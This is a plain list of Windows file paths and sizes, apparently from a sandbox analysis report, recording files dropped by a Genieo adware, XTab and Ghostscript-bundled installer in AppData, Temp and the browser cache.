C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\redHome.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\partner_uninstall.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\icon-16-disabled.png (646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\en_text.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\bin\license.exe (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\network_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\hide_notfication_seperator.png (281 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\expand.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\css\partner.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\LicenseAgreement.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\uac_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002_old\img\tray (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\firefox-bar-16.png (586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-enabled_18px.png (821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-disabled_18px.png (914 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\3_mapping.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\favicon.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-enable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\GenericApp.icns (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\install_icon.ico (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\favicon.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\complete.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\conf\partnerBannedList.dat (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\conf\partnerBannedList.dat (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\off.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\genieo-16icon-browser-disabled.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\error.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\conf\partner.properties (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\tray_normal.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\fr_text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_rgn_image.bmp (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\firefox-bar-16.png (586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\css\notify_partner.css (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sethpButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\prep_env.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\uac_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\ru_complete.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\error.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\prep_env_err.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\text.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\ru_text.properties (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\dfImg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\1_downloading.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\network_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\en_text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\desktop.ico (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo_old\text (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\fr_complete.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\icon-16-enabled.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\partner_uninstall.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-disable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvDA78.tmp (25714 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-disable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\firefox-bar-24.png (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\hide_notification.png (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-4.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-4.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\3_mapping.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\4_creating.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\4_creating.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\footer_right_logo.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\genieo-16icon-browser.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-enabled_18px.png (821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\noItems.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\tray_awaitingMessage.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\off.ico (1 bytes)
C:\Windows\SysWOW64\3280701.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\rebirth[1].htm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB2BD.tmp (25714 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB2BE.tmp\fct.dll (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB2BE.tmp\KillProcDLL.dll (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\down[1] (748 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\http_403_webOC[1] (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\ErrorPageTemplate[1] (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\httpErrorPagesScripts[1] (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\errorPageStrings[1] (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\config[1].json (778 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\info_48[1] (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\bullet[1] (447 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\background_gradient[1] (453 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\XTab_v4.0.exe (152612 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\XTab_4.0.2.1716[1].exe (263908 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\manifest[1].xml (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gsdll32.dll (648640 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_ops.ps (3122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewpcx.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019064l.pfb (18530 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_m.xbm (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059016l.pfb (28130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\showpage.ps (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059036l.pfb (27394 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dbt_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\Setup.exe (29868 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_mgl_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\ppath.ps (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdfwrite.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pcharstr.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\addxchar.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_kanji.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cmap.ps (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018015l.pfb (23234 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018012l.pfb (26066 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_t.xbm (353 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_lev2.ps (6242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf2dsc.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pv.sh (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l2img.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pfbtopfa.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022003l.pfb (22930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_sym_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019003l.pfb (15714 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\impath.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\wrfont.ps (2642 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_s_m.xbm (615 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_rbld.ps (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_main.ps (8594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidcm.ps (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\winmaps.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_t.xpm (633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022023l.pfb (23586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021003l.pfb (26706 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010015l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_base.ps (4226 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\uninfo.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wan_e.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_trap.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052004l.pfb (32818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_m_m.xbm (971 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019024l.pfb (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\acctest.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_type1.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010013l.pfb (16346 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_pfile.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\jispaper.ps (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_s.xpm (993 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_t_m.xbm (363 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\packfile.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_img.ps (3122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_devcs.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\rollconv.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_draw.ps (11330 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\landscap.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewps2a.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_typ42.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_resmp.ps (3122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_sepr.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wl5_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\cid2code.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052003l.pfb (32818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gslp.ps (2642 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\lines.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidfn.ps (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052023l.pfb (31554 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pf2afm.ps (1442 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_typ32.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\align.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019023l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_resst.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_frsd.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cff.ps (3650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_agl.ps (5522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.GS (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\zeroline.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewgif.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wl2_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_font.ps (11338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ccfnt.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\type1ops.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\stocht.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewpbm.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\markhint.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ciecs2.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l.xpm (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ksb_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\prfont.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_pdf_e.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\ps2ai.ps (3650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_lgx_e.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\traceimg.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fform.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\markpath.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_btokn.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dps2.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018035l.pfb (24930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_res.ps (8594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019044l.pfb (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_stres.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021024l.pfb (22674 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dscp.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_mex_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_m.xpm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_rdlin.ps (886 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\fonts.dir (4850 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\docie.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_il1_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022004l.pfb (28914 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\level1.ps (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ciecs3.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewmiff.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_il2_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019004l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l_m.xbm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\z003034l.pfb (26706 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052024l.pfb (32698 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\image-qa.ps (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\d050000l.pfb (11394 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059033l.pfb (28130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021004l.pfb (25474 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gsnup.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\decrypt.ps (369 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cspace.ps (5522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\font2c.ps (2642 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010033l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fapi.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_css_e.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\fonts.scale (4850 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.OSF (386 bytes)
